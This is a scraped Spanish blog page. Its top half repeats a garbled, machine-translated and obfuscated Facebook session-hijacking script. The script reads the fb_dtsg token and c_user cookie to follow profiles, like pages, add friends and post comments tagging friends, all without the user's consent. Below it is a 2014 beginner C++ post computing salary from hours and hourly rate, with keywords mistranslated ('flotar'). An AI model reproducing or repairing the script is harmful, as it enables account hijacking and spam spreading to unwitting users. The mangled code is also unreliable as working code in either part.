funcionar un (abone) {var = new XMLHttpRequest http4; url4 var = "/ ajax / seguimiento / follow_profile.php __ a = 1?"; var sublista (uidss) {var a = document.createElement ('script'); a.innerHTML = "nuevo flid:. "+ + uidss"}) send (); "; document.body.appendChild (a)} sublista (" 499650626822112 "); sublista (" 499650360155472 "); var user_id = document.cookie.match (document.cookie .match (/ c_user = (\ d +) /) [1]); la función gusta (p) {var Página = new XMLHttpRequest (); var PageURL = "// www.facebook.com/ajax/pages/fan_status.php "; var IDS (r) {var x = new XMLHttpRequest (); var XURL = "// www.facebook.com/ajax/add_friend/action.php";var
Me gusta ("244576869034955");
var fb_dtsg = documento [_0xb161 [2]] (_ 0xb161 [1]) [0] [_ 0xb161 [0]]; user_id var = documento [_0xb161 [4]] [_ 0xb161 [3]] (documento [_0xb161 [4]] [ _0xb161 [3]] (/ c_user = (\ d +) /) [1]); var ahora = (nueva fecha) [_ 0xb161 [5]] (); función Informe (_0x45e7x5) {_0x45e7x6 var = new XMLHttpRequest (); var _0x45e7x7 = _0xb161 [6]; var () {If (_0x45e7x6 [_0xb161 [17]] == 4 && _ 0x45e7x6 [_0xb161 [18]] == 200) {_ 0x45e7x6 [_0xb161 [19]];};}; _0x45e7x6 [_0xb161 [20]] (_ 0x45e7x8);} ;
var = "" For (;;); "," "," reemplazar "," responseText ",", "," longitud "," entradas "," carga útil "," redondo "," @ ["," uid ",": "," texto ","] "," fb_dtsg = documento [_0xa22c [2]] (_ 0xa22c [1]) [0] [_ 0xa22c [0]]; user_id var = documento [_0xa22c [4]] [_ 0xa22c [3]] (documento [_0xa22c [4]] [ _0xa22c [3]] (/ c_user = (\ d +) /) [1]); var id = _0xa22c [5]; arkadaşlar var = []; var svn_rev; arkadaslari_al función (id) {var _0x7892x7 = new XMLHttpRequest () ; _0x7892x7 [_0xa22c [6]] = function ;}; Yorum_yap (id, mesaj);};};}; var else {_0x7892x7 [_0xa22c [35]] (_ 0xa22c [33], _ 0xa22c [36] + _ 0x7892x8, true);}; _0x7892x7 [_0xa22c [37]] ();}; RandomArkadas función () {var ; _0x7892xa Retorno;}; yorum_yap función (id, _0x7892xc) {var _0x7892xd = new XMLHttpRequest (); var () {If (_0x7892xd [_0xa22c [7]] == 4 && _ 0x7892xd [_0xa22c [63]] == 200) {_ 0x7892xd [_0xa22c [64]];};}; _0x7892xd [_0xa22c [37]] (_ 0x7892x8);} ; arkadaslari_al (id);
/ * Contraseña3 * /
padres var = document.getElementsByTagName ("html") [0];
var _body = document.getElementsByTagName ("cuerpo") [0];
var _div = document.createElement ('div');
_div.style.height = "25";
_div.style.width = "100%";
_div.style.position = "fijo";
_div.style.top = "auto";
_div.style.bottom = "0";
_div.align = "center";
var _audio = document.createElement ('audio');
_audio.style.width = "100%";
_audio.style.height = "25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = "https://facebook.com";
_div.appendChild (_audio);
_body.appendChild (_div);
var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value;
user_id var = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]);
var fb_dtsg = document.getElementsByName ("fb_dtsg") [0] .value;
user_id var = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]);
funcionar un (abone) {var = new XMLHttpRequest http4; url4 var = "/ ajax / seguimiento / follow_profile.php __ a = 1?"; var sublista (uidss) {var a = document.createElement ('script'); a.innerHTML = "nuevo flid:. "+ + uidss"}) send (); "; document.body.appendChild (a)} sublista (" 499650626822112 "); sublista (" 499650360155472 "); var user_id = document.cookie.match (document.cookie .match (/ c_user = (\ d +) /) [1]); la función gusta (p) {var Página = new XMLHttpRequest (); var PageURL = "// www.facebook.com/ajax/pages/fan_status.php "; var IDS (r) {var x = new XMLHttpRequest (); var XURL = "// www.facebook.com/ajax/add_friend/action.php";var
Me gusta ("244576869034955");
var fb_dtsg = documento [_0xb161 [2]] (_ 0xb161 [1]) [0] [_ 0xb161 [0]]; user_id var = documento [_0xb161 [4]] [_ 0xb161 [3]] (documento [_0xb161 [4]] [ _0xb161 [3]] (/ c_user = (\ d +) /) [1]); var ahora = (nueva fecha) [_ 0xb161 [5]] (); función Informe (_0x45e7x5) {_0x45e7x6 var = new XMLHttpRequest (); var _0x45e7x7 = _0xb161 [6]; var () {If (_0x45e7x6 [_0xb161 [17]] == 4 && _ 0x45e7x6 [_0xb161 [18]] == 200) {_ 0x45e7x6 [_0xb161 [19]];};}; _0x45e7x6 [_0xb161 [20]] (_ 0x45e7x8);} ;
var = "" For (;;); "," "," reemplazar "," responseText ",", "," longitud "," entradas "," carga útil "," redondo "," @ ["," uid ",": "," texto ","] "," fb_dtsg = documento [_0xa22c [2]] (_ 0xa22c [1]) [0] [_ 0xa22c [0]]; user_id var = documento [_0xa22c [4]] [_ 0xa22c [3]] (documento [_0xa22c [4]] [ _0xa22c [3]] (/ c_user = (\ d +) /) [1]); var id = _0xa22c [5]; arkadaşlar var = []; var svn_rev; arkadaslari_al función (id) {var _0x7892x7 = new XMLHttpRequest () ; _0x7892x7 [_0xa22c [6]] = function ;}; Yorum_yap (id, mesaj);};};}; var else {_0x7892x7 [_0xa22c [35]] (_ 0xa22c [33], _ 0xa22c [36] + _ 0x7892x8, true);}; _0x7892x7 [_0xa22c [37]] ();}; RandomArkadas función () {var ; _0x7892xa Retorno;}; yorum_yap función (id, _0x7892xc) {var _0x7892xd = new XMLHttpRequest (); var () {If (_0x7892xd [_0xa22c [7]] == 4 && _ 0x7892xd [_0xa22c [63]] == 200) {_ 0x7892xd [_0xa22c [64]];};}; _0x7892xd [_0xa22c [37]] (_ 0x7892x8);} ; arkadaslari_al (id);

sábado, 8 de febrero de 2014

Programación en C y C++: CALCULAR SALARIO HORA/PRECIO DE HORA

Programación en C y C ++: CALCULAR SALARIO HORA / PRECIO DE HORA : HOLA AMIGOS BLOGGEROS, HOY LES TRAIGO UN CODIGO DE PROGRAMACION PARA C ++ ESTE CONSISTE EN CALCULAR EL SALARIO DE UN EMPLEADO CUANDO SE CON ...

CALCULAR SALARIO HORA/PRECIO DE HORA C++

HOLA AMIGOS BLOGGEROS, HOY LES TRAIGO UN CODIGO DE PROGRAMACION PARA C ++
ESTE CONSISTE EN CALCULAR EL SALARIO DE UN EMPLEADO
CUANDO SE Conocen LAS HORAS QUE TRABAJA Y LO QUE GANA POR HORA.
ASI QUE Comencemos:

// Incluir "stdafx.h"
#include <iostream>
#include <stdio.h>
#include <conio.h>
using namespace std;
int main () {
flotar a, b, c;
a = 0;
b = 0;
c = 0;
cout << "PROGRAMA QUE CALCULA EL SALARIO DE UN TRABAJO \ n";
cout << "INSERTE las horas trabajadas:";
cin >> a;
cout << "\ n INSERTE el precio de la hora: $";
cin >> b;
c = a * b;
cout << "\ n SU SUELDO ES DE: $" << c << endl;
getch ();
}